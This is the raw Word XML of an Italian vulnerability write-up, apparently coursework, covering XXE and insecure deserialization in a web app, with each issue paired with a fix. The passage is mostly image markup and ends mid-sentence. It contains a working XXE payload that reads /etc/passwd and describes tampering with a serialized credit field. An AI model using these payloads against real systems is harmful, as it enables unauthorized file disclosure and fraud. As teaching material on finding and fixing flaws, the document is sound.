    <w:p w14:paraId="3C70D790" w14:textId="3BD58C6B" w:rsidR="00A54E4E" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C49DDC7" w14:textId="5897C5B2" w:rsidR="00EB78A7" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="313F0A94" wp14:editId="518831E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-488315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4099560" cy="3499448"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="148937218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9560" cy="3499448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3368C" w14:textId="7291A5EF" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="06A49EDA" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="59E03C1E" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="68BE0BD7" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="715F610A" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="641BABDE" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="703E2B37" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="345A6826" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7C156091" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="71BA6ACC" w14:textId="69C5431F" w:rsidR="00EB78A7" w:rsidRDefault="00FC6F6C" w:rsidP="00467BBC">
      <w:r>
        <w:t>HobbieController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E547FB8" w14:textId="4FACEFA7" w:rsidR="00FC6F6C" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="078B64D5" wp14:editId="47CF0574">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>42545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5250180" cy="2920218"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28998751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0180" cy="2920218"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7C203" w14:textId="215C72A2" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="34C84D5F" w14:textId="5C060398" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F043E6F" w14:textId="64C4ADFF" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0219D7AD" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="57AF67C6" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7A8222B5" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5634556F" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="12FD3AF1" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="24ABA698" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7706A931" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1EDB0864" w14:textId="359BF83F" w:rsidR="0031586D" w:rsidRDefault="00FC6F6C" w:rsidP="00467BBC">
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040F04A" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264EFACF" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t>&lt;!DOCTYPE replace [&lt;!ENTITY ent SYSTEM "file:///etc/passwd"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF8AC51" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t xml:space="preserve">      &lt;comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F78673" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t xml:space="preserve">        &lt;text&gt;&amp;ent;&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707A888" w14:textId="4AB3D135" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t xml:space="preserve">      &lt;/comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A264833" w14:textId="7ACCC420" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6345AA20" w14:textId="32B79579" w:rsidR="0031586D" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49DCBA60" wp14:editId="06EB1306">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-452120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6888654" cy="3575624"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="138587581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88654" cy="3575624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9AF3F4" w14:textId="07ADD456" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1AEF610E" w14:textId="7D772E15" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="63CD4ECA" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0469379F" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E6E88ED" w14:textId="0747FD07" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0A04A775" w14:textId="6A09E70D" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5A6B9FA0" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="06DDA455" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1B70EFFA" w14:textId="6CC932BD" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="036D1301" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="661099C0" w14:textId="72B61DD3" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC">
      <w:r>
        <w:t>Fix: bisogna bloccare l’utilizzo di External Entities, Doctype e altre caratteristiche in modo da impedire l’attacco.</w:t>
      </w:r>
      <w:r w:rsidR="00BD03FB">
        <w:t xml:space="preserve"> Si può sistemare modificando il metodo /comment nel backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE63AE" w14:textId="269F7C4C" w:rsidR="00AA4F9B" w:rsidRDefault="00BD03FB" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70A42CF0" wp14:editId="6BDEFEAA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5362575" cy="2608006"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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b="46517"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5362575" cy="26080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AB649B" w14:textId="77777777" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4CB80C2D" w14:textId="77777777" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F06F1C0" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="22963997" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A097CA9" w14:textId="77777777" w:rsidR="00BD03FB" w:rsidRDefault="00BD03FB" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D85CC15" w14:textId="77777777" w:rsidR="00BD03FB" w:rsidRDefault="00BD03FB" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4A51D241" w14:textId="77777777" w:rsidR="00BD03FB" w:rsidRDefault="00BD03FB" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6B8162B6" w14:textId="4B2BE27F" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4277924D" w14:textId="77777777" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2A554FFE" w14:textId="37CECF61" w:rsidR="0031586D" w:rsidRDefault="00E464AA" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Insecure deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F450595" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787E44D5" w14:textId="64DCA223" w:rsidR="00CC03BC" w:rsidRDefault="004E4997" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa vulnerabilità si ha quando dati gestiti dall’utente vengono deserializzati dal sito, esponendo i dati all’attaccante che può modificare i campi di un oggetto serializzato o sostituirlo con un altro oggetto. In alcuni casi tali modifiche possono far sollevare delle eccezioni che bloccano il programma. L’errore comune è quello di credere che un oggetto serializzato non sia attaccabile solo perché viene mostrato in maniera non leggibile </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dall’uomo, ma l’oggetto si può facilmente tradurre in un formato leggibile in modo da poterlo modificare correttamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1180B3CA" w14:textId="6C8167AA" w:rsidR="00E464AA" w:rsidRDefault="00EF10FE" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo codice è</w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve"> stato aggiunto un campo credit che si incrementa ogni 30 secondi e premia gli utenti più attivi. In tal modo un utente potrebbe voler incrementare il proprio credito a suo favore sfruttando la serializzazione con cui l’oggetto viene inviato al backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E64E1" w14:textId="77777777" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75963575" w14:textId="47B3FC8A" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AccountUser: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A16D00B" w14:textId="6FB3B1AC" w:rsidR="00E464AA" w:rsidRPr="00E464AA" w:rsidRDefault="00D03FA6" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D0810B0" wp14:editId="77E15F9B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1149985</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3596754" cy="4465320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="61313790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6754" cy="4465320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="310DDC13" w14:textId="26DFB872" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2734F518" w14:textId="0AF94DEE" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B6C1E6C" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="68D19015" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="46A4DD9B" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="64E57F49" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="62DCB206" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="57CAC1A4" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1984193E" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D80066F" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="51FDA723" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5C5C1FE8" w14:textId="25965635" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F5EB102" w14:textId="19F85692" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="32CAFE9B" w14:textId="14B2C495" w:rsidR="00CC03BC" w:rsidRDefault="00CC03BC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="19C8A7CA" w14:textId="3DEECCFE" w:rsidR="00E464AA" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E97A3EB" wp14:editId="5CCEC6DD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>339090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6587125" cy="2751584"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="130791304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87125" cy="2751584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve">UserController: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCE910" w14:textId="5674124C" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57054E5C" w14:textId="34B56FA5" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="56CD7B7C" w14:textId="53903476" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="44091CF3" w14:textId="787DBFD9" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="541309E1" w14:textId="79D7DD5B" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D155534" w14:textId="77777777" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1101C9EF" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="53AE8E8A" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BAE3A58" w14:textId="0CAC93CB" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC">
      <w:r>
        <w:t>File per l’exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570CDDE9" w14:textId="1B9FE34F" w:rsidR="00E464AA" w:rsidRDefault="00AB3362" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34FFA6A5" wp14:editId="6D657D24">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1136015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3841476" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="212465524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t="-1" b="73518"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3841476"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A64D4C" w14:textId="07A963E6" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="75EF79BB" w14:textId="5B59866F" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38080FC7" w14:textId="53997675" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6E2E534D" w14:textId="1DD4383E" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38E3AB52" w14:textId="5DCA589F" w:rsidR="00E464AA" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B04ACC0" wp14:editId="42B9292B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>913765</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>143510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4352925" cy="1041081"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="170071912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t="84424"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4352925" cy="1041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64E413" w14:textId="6FE1CA77" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7E3A1BC1" w14:textId="3F689263" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5A7C5211" w14:textId="63A31550" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3BB07276" w14:textId="02758C70" w:rsidR="00E464AA" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3673F93C" wp14:editId="72994727">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>113665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5212715" cy="4137660"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1057395006"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2">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="8736"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5212715" cy="413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22923" w14:textId="7022A650" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D142BA3" w14:textId="6CDB51AC" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="358EDE90" w14:textId="46FD1E2F" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D11C14C" w14:textId="6802D25D" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="16EC7C08" w14:textId="78E660BC" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1EB87AE8" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="62A7B359" w14:textId="0A0DCCBC" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2A4410BE" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7502EE7D" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="452E3444" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="18CF2EDA" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="776CEEAF" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="23F96853" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="17C1DAC6" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00987816" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: il campo credit non va inviato come oggetto JSON serializzato dal frontend, ma la gestione viene spostata sul backend, grazie alla presenza di </w:t>
      </w:r>
      <w:r w:rsidR="004E3997">
